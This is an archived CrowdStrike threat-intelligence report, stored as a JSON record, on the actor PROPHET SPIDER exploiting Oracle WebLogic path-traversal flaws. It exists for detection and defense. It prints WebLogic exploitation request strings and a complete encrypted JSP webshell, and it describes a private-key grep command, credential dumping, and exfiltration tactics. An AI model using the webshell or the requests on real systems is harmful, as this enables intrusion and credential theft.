{
	"id": "e3556aad-b9de-43e0-b5f9-4b10c6d7265b",
	"created_at": "2026-04-06T00:18:31.665128Z",
	"updated_at": "2026-04-10T03:28:33.595803Z",
	"deleted_at": null,
	"sha1_hash": "139cc895f32d47164b1b03cbe333ca16171532e0",
	"title": "How PROPHET SPIDER Exploits Oracle WebLogic | CrowdStrike",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 201351,
	"plain_text": "How PROPHET SPIDER Exploits Oracle WebLogic | CrowdStrike\r\nBy Falcon OverWatch - CrowdStrike Intelligence - CrowdStrike IR\r\nArchived: 2026-04-05 15:04:37 UTC\r\nCrowdStrike Intelligence, Falcon OverWatch™ and CrowdStrike Incident Response teams have observed\r\nmultiple campaigns by the eCrime actor PROPHET SPIDER where the adversary has exploited Oracle\r\nWebLogic using CVE-2020-14882 and CVE-2020-14750 directory traversal Remote Code Execution\r\n(RCE) vulnerabilities.\r\nPROPHET SPIDER is proficient in exploiting and operating in both Linux and Windows platforms.\r\nIt is likely PROPHET SPIDER monetizes access to victim environments by handing off access to third\r\nparties that will deploy ransomware.\r\nBackground\r\nPROPHET SPIDER is an eCrime actor that has been active since at least May 2017. PROPHET SPIDER\r\nprimarily gains access to victims by compromising vulnerable web servers, and uses a variety of low-prevalence\r\ntools to achieve operational objectives, including the GOTROJ remote access trojan and a variety of reverse shell\r\nbinaries. This blog focuses on PROPHET SPIDER’s recent trend of leveraging CVE-2020-14882 and CVE-2020-14750 to exploit unpatched Oracle WebLogic servers to gain initial access to victim environments. The blog also\r\ndiscusses PROPHET SPIDER’s observed tactics on Windows and Linux systems, and their victim environment\r\naccess handoff operations to multiple adversary groups for ransomware deployment.\r\nOracle WebLogic Exploitation\r\nPROPHET SPIDER typically gains initial access via the exploitation of public-facing applications. In particular,\r\nCrowdStrike has observed PROPHET SPIDER exploit Oracle WebLogic vulnerabilities to gain access to victim\r\nenvironments. A commonly observed avenue is the exploitation of two WebLogic CVEs: CVE-2020-14882 and\r\nCVE-2020-14750. 
Both CVEs are related to path traversal vulnerabilities that allow an adversary access to the\r\nWebLogic administrative console, which consequently allows for unauthenticated remote code execution, or RCE.\r\n(Note: Both vulnerabilities are essentially the same; the patch initially released to address CVE-2020-14882 in\r\nOctober 2020 was bypassed shortly after. The patch for CVE-2020-14750 resolved the issue in a more\r\ncomprehensive manner.) While the two WebLogic CVEs are the most commonly observed avenues of initial\r\naccess, CrowdStrike has also observed PROPHET SPIDER exploit older Oracle CVEs, including CVE-2016-0545, as well as perform SQL injection to gain access. CrowdStrike has not observed PROPHET SPIDER gain\r\ninitial access via other methods such as phishing, brute forcing, malvertising or drive-by downloads. CrowdStrike\r\nhas observed PROPHET SPIDER conduct external reconnaissance scans to determine if a target is vulnerable to a\r\nWebLogic CVE using the website burpcollaborator\u003c.\u003enet. This is a legitimate website that can be used in\r\nconjunction with Burp Suite to receive RCE command responses in blind injection-style attacks. For example, a\r\nCVE-2020-14882/CVE-2020-14750 request involving burpcollaborator\u003c.\u003enet may look like the below, where\r\nan nslookup is performed on a subdomain of burpcollaborator\u003c.\u003enet.\r\nhttps://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/\r\nPage 1 of 10\n\nGET /console/images/%252e%252e%252fconsole.portal?_nfpb=false\u0026_pageLabel=\u0026handle=com.tangosol.coherence\r\nFigure 1. WebLogic access log showing the nslookup command executed on a subdomain of\r\nburpcollaborator\u003c.\u003enet\r\nAnalysts looking for evidence of attempted exploitation of CVE-2020-14882 and/or\r\nCVE-2020-14750 can examine WebLogic access logs for path traversal requests that reference the URI\r\nconsole.portal. 
The requests will involve encoding the characters “../” in some manner. This may look like the\r\nexamples below:\r\nGET /console/images/%252E%252E%252Fconsole.portal\r\nGET /console/css/%252e%252e%252fconsole.portal\r\nGET /console/..%2Fconsole.portal\r\nFigure 2. WebLogic access log showing directory traversal requests that reference console.portal, indicative\r\nof attempted exploitation of CVE-2020-14882/14750\r\nThere are multiple avenues to achieve RCE following the\r\nsuccessful path traversal request. In some cases, the GET request will contain additional parameters that include\r\nthe RCE command. In the example below, the com.tangosol.coherence.mvel2.sh.ShellSession class is invoked to\r\nexecute a curl command.\r\nGET /console/images/%252E%252E%252Fconsole.portal?_nfpb=false\u0026_pageLabel=HomePage1\u0026handle=com.tangosol\r\nFigure 3. WebLogic access log showing the curl command executed via the\r\ntangosol.coherence.mvel2.sh.ShellSession class\r\nAnother similar exploitation request PROPHET SPIDER has\r\nused leverages ClassPathXmlApplicationContext or FileSystemXmlApplicationContext to achieve execution\r\nvia a remotely hosted XML file. The remote URLs referenced in the below figure would host an XML file that\r\ncontains the command to execute.\r\nGET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true\u0026_pageLabel=HomePage1\u0026handle=com.bea.core.r\r\nGET /console/images/%252E%252E%252Fconsole.portal?handle=com.bea.core.repackaged.springframework.context.suppor\r\nFigure 4. WebLogic access log showing ClassPathXmlApplicationContext or\r\nFileSystemXmlApplicationContext classes leveraged to execute commands via a remotely hosted XML file\r\nIt is also possible to gain access without having the RCE command or XML file visible in the GET request. 
By\r\nexamining backend logs on the WebLogic server and correlating them with the access logs, analysts may see path\r\ntraversal requests that line up with errors related to com.tangosol.coherence.mvel2.sh.ShellSession. For\r\nexample:\r\n2021-02-15 02:12:12 0.001 1164 GET /console/..%2Fconsole.portal?_nfpb=true\u0026_pageLabel=UnexpectedExceptionPa\r\n####\u003cFeb 15, 2021, 02:12:13,361 AM EST\u003e \u003c …\u003e Administration Console encountered the following error: Unexpected\r\nFigure 5. WebLogic access log showing directory traversal activity that correlates to a WebLogic console log\r\nerror for com.tangosol.coherence.mvel2.sh.ShellSession\r\nAnalysts may also observe failed RCE on Linux\r\nsystems that attempt to execute a Windows-based command, and vice versa — an indication of how widely and\r\nindiscriminately this vulnerability is being targeted.\r\nLinux Tactics\r\nSince PROPHET SPIDER gains access via web servers or other public-facing servers, they will often initially\r\ncompromise a Linux-based system. Once initial access is obtained on a Linux system, PROPHET SPIDER\r\ntypically deploys a webshell, reverse shell binary or a Perl reverse shell script (commonly named bc.pl) as their\r\ninitial persistence mechanism. 
PROPHET SPIDER demonstrates a good understanding of the Linux command\r\nshell and uses a wide range of commands to enumerate system process, account and networking information.\r\nPersistence\r\nFigure 6 below contains a sample JSP webshell leveraged by PROPHET SPIDER on an Oracle WebLogic server\r\nused as a persistence mechanism that allowed for access and remote commands to be issued on the system.\r\n\u003c\r\n% !String middleware = \"517c7dcfd19771f1\";\r\nString pass = \"3626708ee86f82d0493e684e1f400787\";\r\nString md5 = md5(pass + middleware);\r\nclass X extends ClassLoader {\r\npublic X(ClassLoader z) {\r\nsuper(z);\r\n}\r\npublic Class Q(byte\u003c\u003e cb) {\r\nreturn super.defineClass(cb, 0, cb.length);\r\n}\r\n}\r\npublic byte\u003c\u003e x(byte\u003c\u003e s, boolean m) {\r\ntry {\r\njavax.crypto.Cipher c = javax.crypto.Cipher.getInstance(\"AES\");\r\nc.init(m ? 1 : 2, new javax.crypto.spec.SecretKeySpec(middleware.getBytes(), \"AES\"));\r\nreturn c.doFinal(s);\r\n} catch (Exception e) {\r\nreturn null;\r\n}\r\n}\r\npublic static String md5(String s) {\r\nString ret = null;\r\ntry {\r\njava.security.MessageDigest m;\r\nm = java.security.MessageDigest.getInstance(\"MD5\");\r\nm.update(s.getBytes(), 0, s.length());\r\nret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();\r\n} catch (Exception e) {}\r\nreturn ret;\r\n}\r\npublic static String base64Encode(byte\u003c\u003e bs) throws Exception {\r\nClass base64;\r\nString value = null;\r\ntry {\r\nbase64 = Class.forName(\"java.util.Base64\");\r\nObject Encoder = base64.getMethod(\"getEncoder\", null).invoke(base64, null);\r\nvalue = (String) Encoder.getClass().getMethod(\"encodeToString\", new Class\u003c\u003e {\r\nbyte\u003c\u003e.class\r\n}).invoke(Encoder, new Object\u003c\u003e {\r\nbs\r\n});\r\n} catch (Exception e) {\r\ntry {\r\nbase64 = 
Class.forName(\"sun.misc.BASE64Encoder\");\r\nObject Encoder = base64.newInstance();\r\nvalue = (String) Encoder.getClass().getMethod(\"encode\", new Class\u003c\u003e {\r\nbyte\u003c\u003e.class\r\n}).invoke(Encoder, new Object\u003c\u003e {\r\nbs\r\n});\r\nvalue = value.replace(\"\\n\", \"\").replace(\"\\r\", \"\");\r\n} catch (Exception e2) {}\r\n}\r\nreturn value;\r\n}\r\npublic static byte\u003c\u003e base64Decode(String bs) throws Exception {\r\nClass base64;\r\nbyte\u003c\u003e value = null;\r\ntry {\r\nbase64 = Class.forName(\"java.util.Base64\");\r\nObject decoder = base64.getMethod(\"getDecoder\", null).invoke(base64, null);\r\nvalue = (byte\u003c\u003e) decoder.getClass().getMethod(\"decode\", new Class\u003c\u003e {\r\nString.class\r\n}).invoke(decoder, new Object\u003c\u003e {\r\nbs\r\n});\r\n} catch (Exception e) {\r\ntry {\r\nbase64 = Class.forName(\"sun.misc.BASE64Decoder\");\r\nObject decoder = base64.newInstance();\r\nvalue = (byte\u003c\u003e) decoder.getClass().getMethod(\"decodeBuffer\", new Class\u003c\u003e {\r\nString.class\r\n}).invoke(decoder, new Object\u003c\u003e {\r\nbs\r\n});\r\n} catch (Exception e2) {}\r\n}\r\nreturn value;\r\n} % \u003e\r\n\u003c\r\n%\r\ntry {\r\nbyte\u003c\u003e data = base64Decode(request.getParameter(pass));\r\ndata = x(data, false);\r\nif (session.getAttribute(\"payload\") == null) {\r\nsession.setAttribute(\"payload\", new X(pageContext.getClass().getClassLoader()).Q(data));\r\n} else {\r\nrequest.setAttribute(\"parameters\", new String(data));\r\nObject f = ((Class) session.getAttribute(\"payload\")).newInstance();\r\nf.equals(pageContext);\r\nresponse.getWriter().write(md5.substring(0, 16));\r\nresponse.getWriter().write(base64Encode(x(base64Decode(f.toString()), true)));\r\nresponse.getWriter().write(md5.substring(16));\r\n}\r\n} catch (Exception e) {} % \u003e\r\nFigure 6. 
A sample JSP webshell leveraged by PROPHET SPIDER on an Oracle WebLogic server for\r\npersistence\r\nCredential Access\r\nOn Linux-based systems, PROPHET SPIDER attempts to harvest information relating to SSH keys, and RSA\r\nkeys generally, using cat to list the contents of id_rsa, id_dsa, or .ssh/authorized_keys. In one case,\r\nPROPHET SPIDER used grep to search for private keys stored in files across various directories, including\r\nroot, home, etc, and mnt, for example: timeout 40 grep -rl \\-\\-\\-\\-\\-BEGIN .* PRIVATE KEY.*\\-\\-\\-\\-\\- /home\r\nLateral Movement\r\nTo enable lateral movement, the adversary uses ping and nslookup commands, in addition to scanning the\r\nenvironment for Windows systems listening on port 445. This is done using a simple port scanning binary unique\r\nto PROPHET SPIDER, typically named pscan or pscan2. For example, process logging may reveal similar\r\ncommands to the below. Note the commands are executed by the oracle user account, which is the user that runs\r\nWebLogic. In multiple PROPHET SPIDER cases, CrowdStrike observed a reverse shell binary located at\r\n/var/tmp/, which launches bash as a child; and the pscan2 command is a child to bash. The reverse shell is a\r\nchild to PID 1, which indicates it was either executed via an init script created for persistence, or its parent was\r\nterminated causing it to become a zombie process that was reaped by the init daemon.\r\nUSER PID PPID COMMAND\r\noracle 4210 1 /var/tmp/\r\noracle 4211 4210 bash\r\noracle 5732 4211 ./pscan2 10.10.20.0 10.10.20.255 445 \u003coutput file\u003e\r\nFigure 7. 
Example process listing showing PROPHET SPIDER-invoked processes running on a Linux\r\nsystem under the oracle account\r\nAnti-forensics Activity\r\nPROPHET SPIDER commonly deletes their tools after use using rm, clears the bash HISTFILE environment\r\nvariable and has used a custom ELF binary for clearing logs on Linux devices. PROPHET SPIDER typically\r\ncompresses SSH key information into 7-Zip or TAR archives. In contrast to many other actors using existing\r\nRemote Access Tool (RAT) C2 channels for exfiltration, PROPHET SPIDER uses File Transfer Protocol (FTP) or\r\nPSCP to exfiltrate archived key information.\r\nLinux to Windows Transition\r\nIn some cases, PROPHET SPIDER initially compromises a Windows-based system. However, CrowdStrike has\r\ntypically observed PROPHET SPIDER initially compromise a Linux system and then move into a victim’s\r\nWindows-based environment using compromised credentials via Telnet, SSH or SMB. In multiple cases,\r\nCrowdStrike observed PROPHET SPIDER leverage a SOCKS proxy tool (typically named auditd) that allowed\r\nfor lateral movement into the victim’s Windows environment without having to execute additional programs on\r\nthe compromised Linux system. In some cases, PROPHET SPIDER deployed the WinExe tool, which allows a\r\nLinux system to execute commands remotely on a Windows system. CrowdStrike has observed multiple incidents\r\nwhere the WinExe binary was named wmhost.exe, and the service it created on remote systems to achieve\r\nexecution was named wmhost. CrowdStrike has also observed PROPHET SPIDER execute a ZeroLogon (CVE-2020-1472) exploit binary from Linux targeting the victim’s Windows environment. Analysts should watch for a\r\nlarge number of failed logins, or anonymous logons, originating from the Linux system targeting Windows\r\nsystems. 
Special attention should be paid to any legacy systems such as Windows Server 2003 that may exist in\r\nthe environment, as these can be easier targets for initial lateral movement.\r\nWindows Tactics\r\nPROPHET SPIDER typically uses PowerShell to download Wget, usually to\r\nC:\\Windows\\Temp\\7fde\\wget.bin, as the first post-compromise action on a Windows server running Oracle\r\nWebLogic. The adversary then uses Wget to download additional utilities such as 7zip to\r\nC:\\Windows\\Temp\\7fde\\7z.bin and additional malware, such as the GOTROJ backdoor, reverse shell binaries, or\r\na SOCKS proxy tool. CrowdStrike has observed PROPHET SPIDER consistently use the directory\r\nC:\\Windows\\Temp\\7fde\\ to store tools. The adversary commonly creates Windows services, e.g. WindowsNTApp\r\nfor GOTROJ, to establish persistence for downloaded malware.\r\nFigure 8. Process tree resulting from PROPHET SPIDER targeting a Windows-based WebLogic server,\r\nhighlighting their use of wget.bin and 7z.bin.\r\nIn one case after initial access and persistence was gained\r\nthrough the use of a common JSP webshell, PROPHET SPIDER deployed a JSP SOCKS proxy known as reGeorg\r\nto the external-facing compromised Oracle WebLogic system. The adversary leveraged the proxy and the renamed\r\nWinExe binary to move laterally to other systems in the network and perform initial network and Active Directory\r\nreconnaissance. Analysts should look for source network workstation name mismatches in Windows\r\nauthentication logs, as it was discovered the adversary’s workstation name was captured, likely due to the use of\r\nthe proxy.\r\nCredential Access\r\nOn Windows, PROPHET SPIDER uses vssadmin.exe to obtain Security Account Manager (SAM) and system\r\ncredential stores. 
The adversary has also deployed Mimikatz binaries to dump credentials stored in system\r\nmemory. PROPHET SPIDER consistently attempts to obtain NTDS.DIT, the Active Directory database, typically\r\nusing vssadmin.exe for this purpose. To support credential dumping, PROPHET SPIDER uses\r\nreg query \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\NTDS\\Parameters\"\r\nto identify where NTDS.DIT is located.\r\nData Staging and Exfiltration\r\nAfter gaining access to victim domain controllers, the adversary rapidly introduces additional tooling (7zip,\r\nPSCP/FTP), harvests credential stores, compresses files and then exfiltrates them to a remote IP address using\r\nPSCP or FTP.\r\nAccess Broker and Handoff Tradecraft Observations\r\nIn at least two separate cases, PROPHET SPIDER infections have resulted in ransomware deployment, likely\r\nfrom separate adversary groups. In a 2020 campaign, PROPHET SPIDER did not immediately operationalize a\r\nbreach of an Apache web server. Several months later, an unattributed adversary leveraged this access, conducting\r\ninternal reconnaissance followed by Cobalt Strike deployment, AD enumeration using AdFind and exfiltration\r\nusing WinSCP. This activity was followed by deployment of Egregor ransomware across the environment, and\r\nvictim data was later posted to the Egregor dedicated leak site. In a 2021 campaign, two weeks after PROPHET\r\nSPIDER ceased interactive operations, an unattributed actor downloaded a Cobalt Strike stager DLL from a\r\nremote IP address. When run with the argument 11985756, the DLL downloaded a Cobalt Strike payload. The\r\nadversary used ADFind to enumerate Active Directory, then moved laterally, using a compromised administrative\r\naccount, and downloading additional Cobalt Strike Beacon payloads onto some systems, or using PSExec to run\r\nCobalt Strike. 
The adversary further used PowerSploit to enumerate the victim environment. Before deploying\r\nransomware, the adversary staged data in ZIP archives and likely exfiltrated these archives. Batch scripts\r\nsubsequently deployed MountLocker across the victim environment. While there are multiple potential hypotheses\r\nfor this activity, including PROPHET SPIDER operators deploying ransomware, CrowdStrike Intelligence\r\nassesses that the most likely explanation is that PROPHET SPIDER functioned as an access broker. PROPHET\r\nSPIDER likely granted access to Egregor and MountLocker operators respectively in exchange for payment. This\r\nassessment carries low confidence (see the end of this blog for an explanation of confidence rating), reflecting\r\nseveral factors:\r\nNo other Egregor or MountLocker cases involved PROPHET SPIDER TTPs or artifacts\r\nPROPHET SPIDER’s TTPs differ significantly from TTPs commonly observed in Egregor and\r\nMountLocker campaigns; for instance, PROPHET SPIDER does not normally use Cobalt Strike\r\nMany ransomware operators are known to purchase access to victims via access brokers\r\nRecommendations\r\nThe best defense against opportunistic attacks by access brokers such as PROPHET SPIDER is to ensure your\r\nexternally facing servers are fully patched. However, preventative measures are not a silver bullet. Adversaries\r\nmay be able to bypass even robust and secure perimeters using a variety of techniques. Therefore, proactive threat\r\nhunting such as what Falcon OverWatch provides is also essential. When threat hunters are effectively scouring\r\nyour network for even the most subtle clues of a potential adversary presence, they can quickly home in on\r\nunusual behaviors like the living-off-the-land discovery actions that PROPHET SPIDER commonly leverages\r\nwhen they initially gain access. 
In addition to hunting for unexpected reconnaissance, defenders should also\r\nmonitor their environment for potentially malicious ingress tool transfer. To do so, continually monitor for\r\nunexpected processes retrieving files from external servers as well as uncommon network data flows. Lastly,\r\ndefenders should hunt for malicious and/or anomalous use of legitimate tools, as legacy antivirus products\r\ntypically will not block these tools because of their common and legitimate usage.\r\nIndicators of Compromise\r\nGOTROJ SHA256 hashes:\r\n2b03806939d1171f063ba8d14c3b10622edb5732e4f78dc4fe3eac98b56e5d46\r\n55320dcb7e9e96d2723176c22483a81d47887c4c6ddf063dbf72b3bea5b279e3\r\n57150938be45c4d9c742ab24c693acc14cc071d23b088a1facc2a7512af89414\r\n9d42c2b6a10866842cbb6ab455ee2c3108e79fecbffb72eaf13f05215a826765\r\nJSP Webshell SHA256 hashes:\r\nbb86dcfb6bca5fba8ab92d7a4ded9599baab400804c5fe5fb37aaef75f15e0ac\r\n938804d619e2c7d2e3c31f1479574cbb8c85db14d3b5f0c70ccc22d4599f4ff7\r\nMITRE ATT\u0026CK® Observed Tactics\r\nReconnaissance - T1590: Gather Victim Network Information; T1595.002: Active Scanning: Vulnerability Scanning\r\nInitial Access - T1190: Exploit Public-Facing Application\r\nPersistence - T1505.003: Server Software Component: Web Shell\r\nCredential Access - T1003.003: OS Credential Dumping: NTDS\r\nLateral Movement - T1021: Remote Services\r\nDefense Evasion - T1070.003: Indicator Removal on Host: Clear Command History\r\nExplanation of Confidence Rating\r\nHigh Confidence: Judgments are based on high-quality information from multiple sources. High confidence in\r\nthe quality and quantity of source information supporting a judgment does not imply that the assessment is an\r\nabsolute certainty or fact. The judgment still has a marginal probability of being inaccurate. 
\r\nModerate Confidence: Judgments are based on information that is credibly sourced and plausible, but not of sufficient\r\nquantity or corroborated sufficiently to warrant a higher level of confidence. This level of confidence is used to\r\nexpress that judgments carry an increased probability of being incorrect until more information is available or\r\ncorroborated.\r\nLow Confidence: Judgments are made where the credibility of the source is uncertain, the\r\ninformation is too fragmented or too poorly corroborated to make solid analytic inferences, or the reliability of\r\nthe source is untested. Further information is needed for corroboration of the information or to fill known\r\nintelligence gaps.\r\nAdditional Resources\r\nTo learn more about how to incorporate intelligence on threat actors into your security strategy, visit\r\nthe CROWDSTRIKE FALCON® INTELLIGENCE™ Premium Threat Intelligence page.\r\nVisit the CrowdStrike website to learn more about CrowdStrike Services and Falcon OverWatch offerings.\r\nLearn more on how Falcon Spotlight™ can help you discover and manage vulnerabilities in your\r\nenvironments.\r\nGet a full-featured free trial of CrowdStrike Falcon® Prevent™ and learn how true next-gen AV performs\r\nagainst today’s most sophisticated threats.\r\nSource: https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY"
	],
	"references": [
		"https://www.crowdstrike.com/blog/prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity/"
	],
	"report_names": [
		"prophet-spider-exploits-oracle-weblogic-to-facilitate-ransomware-activity"
	],
	"threat_actors": [
		{
			"id": "056826cb-6e17-4954-a9b4-2cc8c6ae3cb8",
			"created_at": "2023-03-04T02:01:54.115678Z",
			"updated_at": "2026-04-10T02:00:03.360898Z",
			"deleted_at": null,
			"main_name": "Prophet Spider",
			"aliases": [
				"GOLD MELODY",
				"UNC961"
			],
			"source_name": "MISPGALAXY:Prophet Spider",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "47b52642-e5b8-4502-b714-b625002d86aa",
			"created_at": "2024-06-19T02:03:08.086579Z",
			"updated_at": "2026-04-10T02:00:03.812509Z",
			"deleted_at": null,
			"main_name": "GOLD MELODY",
			"aliases": [
				"PROPHET SPIDER",
				"UNC961"
			],
			"source_name": "Secureworks:GOLD MELODY",
			"tools": [
				"7-Zip",
				"AUDITUNNEL",
				"BURP Suite",
				"GOTROJ",
				"JSP webshells",
				"Mimikatz",
				"Wget"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434711,
	"ts_updated_at": 1775791713,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/139cc895f32d47164b1b03cbe333ca16171532e0.pdf",
		"text": "https://archive.orkl.eu/139cc895f32d47164b1b03cbe333ca16171532e0.txt",
		"img": "https://archive.orkl.eu/139cc895f32d47164b1b03cbe333ca16171532e0.jpg"
	}
}